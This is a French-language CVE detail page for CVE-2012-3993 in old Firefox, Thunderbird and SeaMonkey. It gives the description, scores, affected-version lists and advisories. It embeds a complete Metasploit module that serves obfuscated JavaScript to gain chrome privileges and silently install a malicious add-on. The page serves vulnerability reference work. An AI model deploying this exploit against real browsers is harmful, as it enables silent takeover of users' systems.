CVE-2012-3993 : Détail

CVE-2012-3993

Improper Privilege Management
A04-Insecure Design
0.66%V3
Network
2012-10-10
15h00 +00:00
2017-09-18
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The Chrome Object Wrapper (COW) implementation in Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, Thunderbird before 16.0, Thunderbird ESR 10.x before 10.0.8, and SeaMonkey before 2.13 does not properly interact with failures of InstallTrigger methods, which allows remote attackers to execute arbitrary JavaScript code with chrome privileges via a crafted web site, related to an "XrayWrapper pollution" issue.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-269 Improper Privilege Management
The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 30474

Date de publication : 2013-08-05 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Remote::FirefoxAddonGenerator autopwn_info({ :ua_name => HttpClients::FF, :ua_minver => "5.0", :ua_maxver => "15.0.1", :javascript => true, :rank => NormalRanking }) def initialize(info = {}) super(update_info(info, 'Name' => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution', 'Description' => %q{ On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given invalid input, would throw an exception that did not have an __exposedProps__ property set. By re-setting this property on the exception object's prototype, the chrome-based defineProperty method is made available. With the defineProperty method, functions belonging to window and document can be overriden with a function that gets called from chrome-privileged context. From here, another vulnerability in the crypto.generateCRMFRequest function is used to "peek" into the context's private scope. Since the window does not have a chrome:// URL, the insecure parts of Components.classes are not available, so instead the AddonManager API is invoked to silently install a malicious plugin. }, 'License' => MSF_LICENSE, 'Author' => [ 'Mariusz Mlynski', # discovered CVE-2012-3993 'moz_bug_r_a4', # discovered CVE-2013-1710 'joev' # metasploit module ], 'DisclosureDate' => "Aug 6 2013", 'References' => [ ['CVE', '2012-3993'], # used to install function that gets called from chrome:// (ff<15) ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'], ['CVE', '2013-1710'], # used to peek into privileged caller's closure (ff<23) ], 'BrowserRequirements' => { :source => 'script', :ua_name => HttpClients::FF, :ua_ver => lambda { |ver| ver.to_i.between?(5, 15) } } )) register_options([ OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] ) ], self.class) end def on_request_exploit(cli, request, target_info) if request.uri.match(/\.xpi$/i) print_status("Sending the malicious addon") send_response(cli, generate_addon_xpi(cli).pack, { 'Content-Type' => 'application/x-xpinstall' }) else print_status("Sending HTML") res = generate_html(target_info,request.headers['Host']) vprint_status res.to_s send_response_html(cli, res) end end def generate_html(target_info,refer) injection = if target_info[:ua_ver].to_i == 15 "Function.prototype.call.call(p.__defineGetter__,obj,key,runme);" else "p2.constructor.defineProperty(obj,key,{get:runme});" end if refer.nil? or refer.blank? redirect = "#{get_module_uri}/addon.xpi" else proto = ((datastore['SSL']) ? 'https' : 'http') redirect = "#{proto}://#{refer}#{get_module_resource}addon.xpi" end script = js_obfuscate %Q| try{InstallTrigger.install(0)}catch(e){p=e;}; var p2=Object.getPrototypeOf(Object.getPrototypeOf(p)); p2.__exposedProps__={ constructor:'rw', prototype:'rw', defineProperty:'rw', __exposedProps__:'rw' }; var s = document.querySelector('#payload').innerHTML; var q = false; var register = function(obj,key) { var runme = function(){ if (q) return; q = true; window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex"); }; try { #{injection} } catch (e) {} }; for (var i in window) register(window, i); for (var i in document) register(document, i); | js_payload = js_obfuscate %Q| if (!window.done) { window.AddonManager.getInstallForURL( '#{redirect}', function(install) { install.install() }, 'application/x-xpinstall' ); window.done = true; } | %Q| <html> <body> #{datastore['CONTENT']} <div id='payload' style='display:none'> #{js_payload} </div> <script> #{script} </script> </body> </html> | end end

Products Mentioned

Configuraton 0

Mozilla>>Firefox >> Version 10.0

Mozilla>>Firefox >> Version 10.0.1

Mozilla>>Firefox >> Version 10.0.2

Mozilla>>Firefox >> Version 10.0.3

Mozilla>>Firefox >> Version 10.0.4

Mozilla>>Firefox >> Version 10.0.5

Mozilla>>Firefox >> Version 10.0.6

Mozilla>>Firefox >> Version 10.0.7

Configuraton 0

Mozilla>>Thunderbird_esr >> Version 10.0

Mozilla>>Thunderbird_esr >> Version 10.0.1

Mozilla>>Thunderbird_esr >> Version 10.0.2

Mozilla>>Thunderbird_esr >> Version 10.0.3

Mozilla>>Thunderbird_esr >> Version 10.0.4

Mozilla>>Thunderbird_esr >> Version 10.0.5

Mozilla>>Thunderbird_esr >> Version 10.0.6

Mozilla>>Thunderbird_esr >> Version 10.0.7

Configuraton 0

Mozilla>>Firefox >> Version To (including) 15.0.1

Mozilla>>Firefox >> Version 1.0

Mozilla>>Firefox >> Version 1.0

Mozilla>>Firefox >> Version 1.0.1

Mozilla>>Firefox >> Version 1.0.2

Mozilla>>Firefox >> Version 1.0.3

Mozilla>>Firefox >> Version 1.0.4

Mozilla>>Firefox >> Version 1.0.5

Mozilla>>Firefox >> Version 1.0.6

Mozilla>>Firefox >> Version 1.0.7

Mozilla>>Firefox >> Version 1.0.8

Mozilla>>Firefox >> Version 1.4.1

Mozilla>>Firefox >> Version 1.5

Mozilla>>Firefox >> Version 1.5

Mozilla>>Firefox >> Version 1.5

Mozilla>>Firefox >> Version 1.5.0.1

Mozilla>>Firefox >> Version 1.5.0.2

Mozilla>>Firefox >> Version 1.5.0.3

Mozilla>>Firefox >> Version 1.5.0.4

Mozilla>>Firefox >> Version 1.5.0.5

Mozilla>>Firefox >> Version 1.5.0.6

Mozilla>>Firefox >> Version 1.5.0.7

Mozilla>>Firefox >> Version 1.5.0.8

Mozilla>>Firefox >> Version 1.5.0.9

Mozilla>>Firefox >> Version 1.5.0.10

Mozilla>>Firefox >> Version 1.5.0.11

Mozilla>>Firefox >> Version 1.5.0.12

Mozilla>>Firefox >> Version 1.5.1

Mozilla>>Firefox >> Version 1.5.2

Mozilla>>Firefox >> Version 1.5.3

Mozilla>>Firefox >> Version 1.5.4

Mozilla>>Firefox >> Version 1.5.5

Mozilla>>Firefox >> Version 1.5.6

Mozilla>>Firefox >> Version 1.5.7

Mozilla>>Firefox >> Version 1.5.8

Mozilla>>Firefox >> Version 1.8

Mozilla>>Firefox >> Version 2.0

Mozilla>>Firefox >> Version 2.0.0.1

Mozilla>>Firefox >> Version 2.0.0.2

Mozilla>>Firefox >> Version 2.0.0.3

Mozilla>>Firefox >> Version 2.0.0.4

Mozilla>>Firefox >> Version 2.0.0.5

Mozilla>>Firefox >> Version 2.0.0.6

Mozilla>>Firefox >> Version 2.0.0.7

Mozilla>>Firefox >> Version 2.0.0.8

Mozilla>>Firefox >> Version 2.0.0.9

Mozilla>>Firefox >> Version 2.0.0.10

Mozilla>>Firefox >> Version 2.0.0.11

Mozilla>>Firefox >> Version 2.0.0.12

Mozilla>>Firefox >> Version 2.0.0.13

Mozilla>>Firefox >> Version 2.0.0.14

Mozilla>>Firefox >> Version 2.0.0.15

Mozilla>>Firefox >> Version 2.0.0.16

Mozilla>>Firefox >> Version 2.0.0.17

Mozilla>>Firefox >> Version 2.0.0.18

Mozilla>>Firefox >> Version 2.0.0.19

Mozilla>>Firefox >> Version 2.0.0.20

Mozilla>>Firefox >> Version 3.0

Mozilla>>Firefox >> Version 3.0.1

Mozilla>>Firefox >> Version 3.0.2

Mozilla>>Firefox >> Version 3.0.3

Mozilla>>Firefox >> Version 3.0.4

Mozilla>>Firefox >> Version 3.0.5

Mozilla>>Firefox >> Version 3.0.6

Mozilla>>Firefox >> Version 3.0.7

Mozilla>>Firefox >> Version 3.0.8

Mozilla>>Firefox >> Version 3.0.9

Mozilla>>Firefox >> Version 3.0.10

Mozilla>>Firefox >> Version 3.0.11

Mozilla>>Firefox >> Version 3.0.12

Mozilla>>Firefox >> Version 3.0.13

Mozilla>>Firefox >> Version 3.0.14

Mozilla>>Firefox >> Version 3.0.15

Mozilla>>Firefox >> Version 3.0.16

Mozilla>>Firefox >> Version 3.0.17

Mozilla>>Firefox >> Version 3.5

Mozilla>>Firefox >> Version 3.5.1

Mozilla>>Firefox >> Version 3.5.2

Mozilla>>Firefox >> Version 3.5.3

Mozilla>>Firefox >> Version 3.5.4

Mozilla>>Firefox >> Version 3.5.5

Mozilla>>Firefox >> Version 3.5.6

Mozilla>>Firefox >> Version 3.5.7

Mozilla>>Firefox >> Version 3.5.8

Mozilla>>Firefox >> Version 3.5.9

Mozilla>>Firefox >> Version 3.5.10

Mozilla>>Firefox >> Version 3.5.11

Mozilla>>Firefox >> Version 3.5.12

Mozilla>>Firefox >> Version 3.5.13

Mozilla>>Firefox >> Version 3.5.14

Mozilla>>Firefox >> Version 3.5.15

Mozilla>>Firefox >> Version 3.6

Mozilla>>Firefox >> Version 3.6.2

Mozilla>>Firefox >> Version 3.6.3

Mozilla>>Firefox >> Version 3.6.4

Mozilla>>Firefox >> Version 3.6.6

Mozilla>>Firefox >> Version 3.6.7

Mozilla>>Firefox >> Version 3.6.8

Mozilla>>Firefox >> Version 3.6.9

Mozilla>>Firefox >> Version 3.6.10

Mozilla>>Firefox >> Version 3.6.11

Mozilla>>Firefox >> Version 3.6.12

Mozilla>>Firefox >> Version 3.6.13

Mozilla>>Firefox >> Version 3.6.14

Mozilla>>Firefox >> Version 3.6.15

Mozilla>>Firefox >> Version 3.6.16

Mozilla>>Firefox >> Version 3.6.17

Mozilla>>Firefox >> Version 3.6.18

Mozilla>>Firefox >> Version 3.6.19

Mozilla>>Firefox >> Version 3.6.20

Mozilla>>Firefox >> Version 3.6.21

Mozilla>>Firefox >> Version 3.6.22

Mozilla>>Firefox >> Version 3.6.23

Mozilla>>Firefox >> Version 3.6.24

Mozilla>>Firefox >> Version 3.6.25

Mozilla>>Firefox >> Version 4.0

Mozilla>>Firefox >> Version 4.0

Mozilla>>Firefox >> Version 4.0

Mozilla>>Firefox >> Version 4.0

Mozilla>>Firefox >> Version 4.0

Mozilla>>Firefox >> Version 4.0

Mozilla>>Firefox >> Version 4.0

Mozilla>>Firefox >> Version 4.0

Mozilla>>Firefox >> Version 4.0

Mozilla>>Firefox >> Version 4.0

Mozilla>>Firefox >> Version 4.0

Mozilla>>Firefox >> Version 4.0

Mozilla>>Firefox >> Version 4.0

Mozilla>>Firefox >> Version 4.0.1

Mozilla>>Firefox >> Version 5.0

Mozilla>>Firefox >> Version 5.0.1

Mozilla>>Firefox >> Version 6.0

Mozilla>>Firefox >> Version 6.0.1

Mozilla>>Firefox >> Version 6.0.2

Mozilla>>Firefox >> Version 7.0

Mozilla>>Firefox >> Version 7.0.1

Mozilla>>Firefox >> Version 8.0

Mozilla>>Firefox >> Version 8.0.1

Mozilla>>Firefox >> Version 9.0

Mozilla>>Firefox >> Version 9.0.1

Mozilla>>Firefox >> Version 10.0

Mozilla>>Firefox >> Version 10.0.1

Mozilla>>Firefox >> Version 10.0.2

Mozilla>>Firefox >> Version 11.0

Mozilla>>Firefox >> Version 12.0

Mozilla>>Firefox >> Version 12.0

Mozilla>>Firefox >> Version 13.0

Mozilla>>Firefox >> Version 13.0.1

Mozilla>>Firefox >> Version 14.0

Mozilla>>Firefox >> Version 14.0.1

Mozilla>>Firefox >> Version 15.0

Configuraton 0

Mozilla>>Thunderbird >> Version To (including) 15.0.1

Mozilla>>Thunderbird >> Version 1.0

Mozilla>>Thunderbird >> Version 1.0.1

    Mozilla>>Thunderbird >> Version 1.0.2

    Mozilla>>Thunderbird >> Version 1.0.3

      Mozilla>>Thunderbird >> Version 1.0.4

        Mozilla>>Thunderbird >> Version 1.0.5

        Mozilla>>Thunderbird >> Version 1.0.5

          Mozilla>>Thunderbird >> Version 1.0.6

          Mozilla>>Thunderbird >> Version 1.0.7

          Mozilla>>Thunderbird >> Version 1.0.8

          Mozilla>>Thunderbird >> Version 1.5

          Mozilla>>Thunderbird >> Version 1.5

          Mozilla>>Thunderbird >> Version 1.5.0.1

            Mozilla>>Thunderbird >> Version 1.5.0.2

            Mozilla>>Thunderbird >> Version 1.5.0.3

              Mozilla>>Thunderbird >> Version 1.5.0.4

              Mozilla>>Thunderbird >> Version 1.5.0.5

              Mozilla>>Thunderbird >> Version 1.5.0.6

                Mozilla>>Thunderbird >> Version 1.5.0.7

                Mozilla>>Thunderbird >> Version 1.5.0.8

                Mozilla>>Thunderbird >> Version 1.5.0.9

                Mozilla>>Thunderbird >> Version 1.5.0.10

                Mozilla>>Thunderbird >> Version 1.5.0.11

                  Mozilla>>Thunderbird >> Version 1.5.0.12

                  Mozilla>>Thunderbird >> Version 1.5.0.13

                  Mozilla>>Thunderbird >> Version 1.5.0.14

                  Mozilla>>Thunderbird >> Version 1.5.1

                    Mozilla>>Thunderbird >> Version 1.5.2

                      Mozilla>>Thunderbird >> Version 1.7.1

                        Mozilla>>Thunderbird >> Version 1.7.3

                          Mozilla>>Thunderbird >> Version 2.0

                          Mozilla>>Thunderbird >> Version 2.0.0.0

                          Mozilla>>Thunderbird >> Version 2.0.0.1

                            Mozilla>>Thunderbird >> Version 2.0.0.2

                              Mozilla>>Thunderbird >> Version 2.0.0.3

                                Mozilla>>Thunderbird >> Version 2.0.0.4

                                Mozilla>>Thunderbird >> Version 2.0.0.5

                                Mozilla>>Thunderbird >> Version 2.0.0.6

                                Mozilla>>Thunderbird >> Version 2.0.0.7

                                  Mozilla>>Thunderbird >> Version 2.0.0.8

                                    Mozilla>>Thunderbird >> Version 2.0.0.9

                                    Mozilla>>Thunderbird >> Version 2.0.0.11

                                      Mozilla>>Thunderbird >> Version 2.0.0.12

                                      Mozilla>>Thunderbird >> Version 2.0.0.13

                                        Mozilla>>Thunderbird >> Version 2.0.0.14

                                        Mozilla>>Thunderbird >> Version 2.0.0.15

                                          Mozilla>>Thunderbird >> Version 2.0.0.16

                                          Mozilla>>Thunderbird >> Version 2.0.0.17

                                          Mozilla>>Thunderbird >> Version 2.0.0.18

                                          Mozilla>>Thunderbird >> Version 2.0.0.19

                                          Mozilla>>Thunderbird >> Version 2.0.0.20

                                            Mozilla>>Thunderbird >> Version 2.0.0.21

                                            Mozilla>>Thunderbird >> Version 2.0.0.22

                                            Mozilla>>Thunderbird >> Version 2.0.0.23

                                            Mozilla>>Thunderbird >> Version 3.0

                                            Mozilla>>Thunderbird >> Version 3.0.1

                                            Mozilla>>Thunderbird >> Version 3.0.2

                                            Mozilla>>Thunderbird >> Version 3.0.3

                                            Mozilla>>Thunderbird >> Version 3.0.4

                                            Mozilla>>Thunderbird >> Version 3.0.5

                                            Mozilla>>Thunderbird >> Version 3.0.6

                                            Mozilla>>Thunderbird >> Version 3.0.7

                                            Mozilla>>Thunderbird >> Version 3.0.8

                                            Mozilla>>Thunderbird >> Version 3.0.9

                                            Mozilla>>Thunderbird >> Version 3.0.10

                                            Mozilla>>Thunderbird >> Version 3.0.11

                                            Mozilla>>Thunderbird >> Version 3.1

                                            Mozilla>>Thunderbird >> Version 3.1.1

                                            Mozilla>>Thunderbird >> Version 3.1.2

                                            Mozilla>>Thunderbird >> Version 3.1.3

                                            Mozilla>>Thunderbird >> Version 3.1.4

                                            Mozilla>>Thunderbird >> Version 3.1.5

                                            Mozilla>>Thunderbird >> Version 3.1.6

                                            Mozilla>>Thunderbird >> Version 3.1.7

                                            Mozilla>>Thunderbird >> Version 3.1.8

                                            Mozilla>>Thunderbird >> Version 3.1.9

                                            Mozilla>>Thunderbird >> Version 3.1.10

                                            Mozilla>>Thunderbird >> Version 3.1.11

                                            Mozilla>>Thunderbird >> Version 3.1.12

                                            Mozilla>>Thunderbird >> Version 3.1.13

                                            Mozilla>>Thunderbird >> Version 3.1.14

                                            Mozilla>>Thunderbird >> Version 3.1.15

                                            Mozilla>>Thunderbird >> Version 3.1.16

                                            Mozilla>>Thunderbird >> Version 3.1.17

                                            Mozilla>>Thunderbird >> Version 5.0

                                            Mozilla>>Thunderbird >> Version 6.0

                                            Mozilla>>Thunderbird >> Version 6.0.1

                                            Mozilla>>Thunderbird >> Version 6.0.2

                                            Mozilla>>Thunderbird >> Version 7.0

                                            Mozilla>>Thunderbird >> Version 7.0.1

                                            Mozilla>>Thunderbird >> Version 8.0

                                            Mozilla>>Thunderbird >> Version 9.0

                                            Mozilla>>Thunderbird >> Version 9.0.1

                                            Mozilla>>Thunderbird >> Version 10.0

                                            Mozilla>>Thunderbird >> Version 10.0.1

                                            Mozilla>>Thunderbird >> Version 10.0.2

                                            Mozilla>>Thunderbird >> Version 10.0.3

                                              Mozilla>>Thunderbird >> Version 10.0.4

                                                Mozilla>>Thunderbird >> Version 11.0

                                                Mozilla>>Thunderbird >> Version 11.0.1

                                                Mozilla>>Thunderbird >> Version 12.0

                                                Mozilla>>Thunderbird >> Version 12.0.1

                                                Mozilla>>Thunderbird >> Version 13.0

                                                Mozilla>>Thunderbird >> Version 13.0.1

                                                Mozilla>>Thunderbird >> Version 14.0

                                                Mozilla>>Thunderbird >> Version 15.0

                                                Configuraton 0

                                                Mozilla>>Seamonkey >> Version To (including) 2.13

                                                Mozilla>>Seamonkey >> Version 2.0

                                                Mozilla>>Seamonkey >> Version 2.0

                                                Mozilla>>Seamonkey >> Version 2.0

                                                Mozilla>>Seamonkey >> Version 2.0

                                                Mozilla>>Seamonkey >> Version 2.0

                                                Mozilla>>Seamonkey >> Version 2.0

                                                Mozilla>>Seamonkey >> Version 2.0

                                                Mozilla>>Seamonkey >> Version 2.0

                                                Mozilla>>Seamonkey >> Version 2.0.1

                                                Mozilla>>Seamonkey >> Version 2.0.2

                                                Mozilla>>Seamonkey >> Version 2.0.3

                                                Mozilla>>Seamonkey >> Version 2.0.4

                                                Mozilla>>Seamonkey >> Version 2.0.5

                                                Mozilla>>Seamonkey >> Version 2.0.6

                                                Mozilla>>Seamonkey >> Version 2.0.7

                                                Mozilla>>Seamonkey >> Version 2.0.8

                                                Mozilla>>Seamonkey >> Version 2.0.9

                                                Mozilla>>Seamonkey >> Version 2.0.10

                                                Mozilla>>Seamonkey >> Version 2.0.11

                                                Mozilla>>Seamonkey >> Version 2.0.12

                                                Mozilla>>Seamonkey >> Version 2.0.13

                                                Mozilla>>Seamonkey >> Version 2.0.14

                                                Mozilla>>Seamonkey >> Version 2.1

                                                Mozilla>>Seamonkey >> Version 2.1

                                                Mozilla>>Seamonkey >> Version 2.1

                                                Mozilla>>Seamonkey >> Version 2.1

                                                Mozilla>>Seamonkey >> Version 2.1

                                                Mozilla>>Seamonkey >> Version 2.1

                                                Mozilla>>Seamonkey >> Version 2.1

                                                Mozilla>>Seamonkey >> Version 2.1

                                                Mozilla>>Seamonkey >> Version 2.1

                                                Mozilla>>Seamonkey >> Version 2.2

                                                Mozilla>>Seamonkey >> Version 2.2

                                                Mozilla>>Seamonkey >> Version 2.2

                                                Mozilla>>Seamonkey >> Version 2.2

                                                Mozilla>>Seamonkey >> Version 2.3

                                                Mozilla>>Seamonkey >> Version 2.3

                                                Mozilla>>Seamonkey >> Version 2.3

                                                Mozilla>>Seamonkey >> Version 2.3

                                                Mozilla>>Seamonkey >> Version 2.3.1

                                                Mozilla>>Seamonkey >> Version 2.3.2

                                                Mozilla>>Seamonkey >> Version 2.3.3

                                                Mozilla>>Seamonkey >> Version 2.4

                                                Mozilla>>Seamonkey >> Version 2.4

                                                Mozilla>>Seamonkey >> Version 2.4

                                                Mozilla>>Seamonkey >> Version 2.4

                                                Mozilla>>Seamonkey >> Version 2.4.1

                                                Mozilla>>Seamonkey >> Version 2.5

                                                Mozilla>>Seamonkey >> Version 2.5

                                                Mozilla>>Seamonkey >> Version 2.5

                                                Mozilla>>Seamonkey >> Version 2.5

                                                Mozilla>>Seamonkey >> Version 2.5

                                                Mozilla>>Seamonkey >> Version 2.6

                                                Mozilla>>Seamonkey >> Version 2.6

                                                Mozilla>>Seamonkey >> Version 2.6

                                                Mozilla>>Seamonkey >> Version 2.6

                                                Mozilla>>Seamonkey >> Version 2.6

                                                Mozilla>>Seamonkey >> Version 2.6.1

                                                Mozilla>>Seamonkey >> Version 2.7

                                                Mozilla>>Seamonkey >> Version 2.7

                                                Mozilla>>Seamonkey >> Version 2.7

                                                Mozilla>>Seamonkey >> Version 2.7

                                                Mozilla>>Seamonkey >> Version 2.7

                                                Mozilla>>Seamonkey >> Version 2.7

                                                Mozilla>>Seamonkey >> Version 2.7.1

                                                Mozilla>>Seamonkey >> Version 2.7.2

                                                Mozilla>>Seamonkey >> Version 2.8

                                                Mozilla>>Seamonkey >> Version 2.8

                                                Mozilla>>Seamonkey >> Version 2.8

                                                Mozilla>>Seamonkey >> Version 2.8

                                                Mozilla>>Seamonkey >> Version 2.8

                                                Mozilla>>Seamonkey >> Version 2.8

                                                Mozilla>>Seamonkey >> Version 2.8

                                                Mozilla>>Seamonkey >> Version 2.9

                                                Mozilla>>Seamonkey >> Version 2.9

                                                Mozilla>>Seamonkey >> Version 2.9

                                                Mozilla>>Seamonkey >> Version 2.9

                                                Mozilla>>Seamonkey >> Version 2.9

                                                Mozilla>>Seamonkey >> Version 2.9.1

                                                Mozilla>>Seamonkey >> Version 2.10

                                                Mozilla>>Seamonkey >> Version 2.10

                                                Mozilla>>Seamonkey >> Version 2.10

                                                Mozilla>>Seamonkey >> Version 2.10

                                                Mozilla>>Seamonkey >> Version 2.10.1

                                                Mozilla>>Seamonkey >> Version 2.11

                                                Mozilla>>Seamonkey >> Version 2.11

                                                Mozilla>>Seamonkey >> Version 2.11

                                                Mozilla>>Seamonkey >> Version 2.11

                                                Mozilla>>Seamonkey >> Version 2.11

                                                Mozilla>>Seamonkey >> Version 2.11

                                                Mozilla>>Seamonkey >> Version 2.11

                                                Mozilla>>Seamonkey >> Version 2.12

                                                Mozilla>>Seamonkey >> Version 2.12

                                                Mozilla>>Seamonkey >> Version 2.12

                                                Mozilla>>Seamonkey >> Version 2.12

                                                Mozilla>>Seamonkey >> Version 2.12

                                                Mozilla>>Seamonkey >> Version 2.12

                                                Mozilla>>Seamonkey >> Version 2.12

                                                Mozilla>>Seamonkey >> Version 2.12.1

                                                Mozilla>>Seamonkey >> Version 2.13

                                                Mozilla>>Seamonkey >> Version 2.13

                                                Mozilla>>Seamonkey >> Version 2.13

                                                Mozilla>>Seamonkey >> Version 2.13

                                                Mozilla>>Seamonkey >> Version 2.13

                                                Références

                                                http://secunia.com/advisories/50904
                                                Tags : third-party-advisory, x_refsource_SECUNIA
                                                http://secunia.com/advisories/50984
                                                Tags : third-party-advisory, x_refsource_SECUNIA
                                                http://secunia.com/advisories/50935
                                                Tags : third-party-advisory, x_refsource_SECUNIA
                                                http://secunia.com/advisories/50856
                                                Tags : third-party-advisory, x_refsource_SECUNIA
                                                http://secunia.com/advisories/50892
                                                Tags : third-party-advisory, x_refsource_SECUNIA
                                                http://rhn.redhat.com/errata/RHSA-2012-1351.html
                                                Tags : vendor-advisory, x_refsource_REDHAT
                                                http://secunia.com/advisories/50936
                                                Tags : third-party-advisory, x_refsource_SECUNIA
                                                http://osvdb.org/86111
                                                Tags : vdb-entry, x_refsource_OSVDB
                                                http://secunia.com/advisories/55318
                                                Tags : third-party-advisory, x_refsource_SECUNIA
                                                http://www.mandriva.com/security/advisories?name=MDVSA-2012:163
                                                Tags : vendor-advisory, x_refsource_MANDRIVA
                                                http://www.ubuntu.com/usn/USN-1611-1
                                                Tags : vendor-advisory, x_refsource_UBUNTU
                                                http://www.securityfocus.com/bid/56119
                                                Tags : vdb-entry, x_refsource_BID